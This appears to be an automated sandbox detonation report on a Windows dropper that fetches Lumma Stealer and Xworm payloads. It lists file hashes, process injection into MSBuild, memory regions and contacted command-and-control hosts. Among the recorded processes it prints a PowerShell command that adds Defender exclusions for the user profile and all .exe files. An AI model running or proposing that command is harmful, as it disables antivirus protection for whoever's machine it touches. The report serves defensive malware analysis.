| SHA512 | ffde7a5727e67998e09cfa90b8db7ac11f17b815a3c846a0a52cf98962049bdb7da94aa0a74f26977a2797309835fd4638c636a6e9412ddc22746fe39af776a6 |
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
| MD5 | f7f9ed55e782f4d2d43fb0703dd1273f |
| SHA1 | 8bb98c59bb35055ccf1b52ef12db24cca50b58b0 |
| SHA256 | ad044817d9a6c1b798001fbf0f769c0ac1d8486afb9dede03543b934be6df3c6 |
| SHA512 | 1126c63648b573b01bcffc1ac037c3ed29074834f1716e54352a1679a4c9d5d393068b22e3820c62e398ab81d127fc242f306e158bf393e58742995df7896ce7 |
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe
| MD5 | bee498bb6818e1eec3f96ed8c371e4c3 |
| SHA1 | 5cd9f249cb2e4888b6ff488e2b3795ead65460f9 |
| SHA256 | 5dcd18a45f245b8f03ee330afd54014c3dcd6e96b0f9fa0d9b2c98498fd11306 |
| SHA512 | 0821397200c422f1c912a11babb17da7c0fad61ad7fd1e66950fdf80217d87e17b571713b83b66bdbc63996dd01637437296fd186bb205e5665f0965d599bca1 |
memory/4884-76-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-105-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-107-0x0000000005780000-0x0000000005AF1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | ae20c32d0b9e8699756e93f9372972fa |
| SHA1 | 0a80ba47f8175b177ff7f507906e376f0b1a3db3 |
| SHA256 | 5054d87f5429374c958f4ee191993b826be2568307c5b53067c0ee771690591d |
| SHA512 | a37cb8de74b593304985d896c1bf86cd6dd144f72d24cd3796308ea04c218c09dc3716a3e66fe3c1455b61a3b8a96e1c942c67ef291e9da15e4a662ac4669f1a |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2ywvoq5.nv1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa187cac09f051e24146ad549a0f08a6 |
| SHA1 | 2ef7fae3652bb838766627fa6584a6e3b5e74ff3 |
| SHA256 | 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f |
| SHA512 | 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-06-05 19:12
Reported
2025-06-05 19:13
Platform
win11-20250502-en
Max time kernel
20s
Max time network
30s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\XClient.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1792 set thread context of 5552 | N/A | C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 684 set thread context of 4100 | N/A | C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe
"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe
"C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe"
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe
"C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe
"C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| UA | 185.156.72.2:80 | 185.156.72.2 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| US | 154.53.41.5:80 | 154.53.41.5 | tcp |
| KR | 218.236.59.183:47006 | 218.236.59.183 | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
Files
memory/5420-0-0x00007FF92E833000-0x00007FF92E835000-memory.dmp
memory/5420-1-0x0000000000A30000-0x0000000000A38000-memory.dmp
memory/5420-2-0x00007FF92E830000-0x00007FF92F2F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe
| MD5 | a4800db4a176fdba6d86bde9e21d7d4b |
| SHA1 | c927378fd0aff61a865860b81ea49182ad3fc896 |
| SHA256 | 4738fee480de92666fc5cb7e6c9a4b0d97cd3d3b7ff9d642288e0cc604d407ae |
| SHA512 | cbcecf64126f92844858213e7050942c63cbdf23522e1e8ac0887c655c615239bdf4111475a7ebffa4bf700ec59b6a8125fed46201ff2238eb9d8e4c8e4236c6 |
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe
| MD5 | 45445e04eeaaab44456e4296c25ddb1b |
| SHA1 | 75f242422d7329a0a3f9a1230cf694443601717e |
| SHA256 | 82f77e79a0052160d388738a17a60e3733e439dd6beb53c88232e075ccef7d6e |
| SHA512 | ffde7a5727e67998e09cfa90b8db7ac11f17b815a3c846a0a52cf98962049bdb7da94aa0a74f26977a2797309835fd4638c636a6e9412ddc22746fe39af776a6 |
memory/5552-24-0x0000000000400000-0x000000000045F000-memory.dmp
memory/5552-26-0x0000000000400000-0x000000000045F000-memory.dmp
memory/5552-27-0x0000000000400000-0x000000000045F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
| MD5 | f7f9ed55e782f4d2d43fb0703dd1273f |
| SHA1 | 8bb98c59bb35055ccf1b52ef12db24cca50b58b0 |
| SHA256 | ad044817d9a6c1b798001fbf0f769c0ac1d8486afb9dede03543b934be6df3c6 |
| SHA512 | 1126c63648b573b01bcffc1ac037c3ed29074834f1716e54352a1679a4c9d5d393068b22e3820c62e398ab81d127fc242f306e158bf393e58742995df7896ce7 |
memory/5552-36-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4108-40-0x0000000000B50000-0x0000000000F8C000-memory.dmp
memory/4108-41-0x00000000059F0000-0x0000000005D68000-memory.dmp
memory/4108-43-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-51-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-59-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-74-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-86-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-84-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-100-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-113-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-111-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-109-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/5420-143-0x00007FF92E833000-0x00007FF92E835000-memory.dmp
memory/4108-107-0x00000000059F0000-0x0000000005D61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe
| MD5 | bee498bb6818e1eec3f96ed8c371e4c3 |
| SHA1 | 5cd9f249cb2e4888b6ff488e2b3795ead65460f9 |
| SHA256 | 5dcd18a45f245b8f03ee330afd54014c3dcd6e96b0f9fa0d9b2c98498fd11306 |
| SHA512 | 0821397200c422f1c912a11babb17da7c0fad61ad7fd1e66950fdf80217d87e17b571713b83b66bdbc63996dd01637437296fd186bb205e5665f0965d599bca1 |
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | ae20c32d0b9e8699756e93f9372972fa |
| SHA1 | 0a80ba47f8175b177ff7f507906e376f0b1a3db3 |
| SHA256 | 5054d87f5429374c958f4ee191993b826be2568307c5b53067c0ee771690591d |
| SHA512 | a37cb8de74b593304985d896c1bf86cd6dd144f72d24cd3796308ea04c218c09dc3716a3e66fe3c1455b61a3b8a96e1c942c67ef291e9da15e4a662ac4669f1a |
memory/4108-105-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4768-157-0x0000000000930000-0x000000000093E000-memory.dmp
memory/4108-89-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-82-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-80-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-102-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-78-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-76-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-72-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-70-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-68-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-66-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-63-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-61-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-57-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-55-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-53-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-49-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-47-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-45-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-42-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/5420-253-0x00007FF92E830000-0x00007FF92F2F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o4gthjps.2w3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4588-2397-0x000001EF1D250000-0x000001EF1D272000-memory.dmp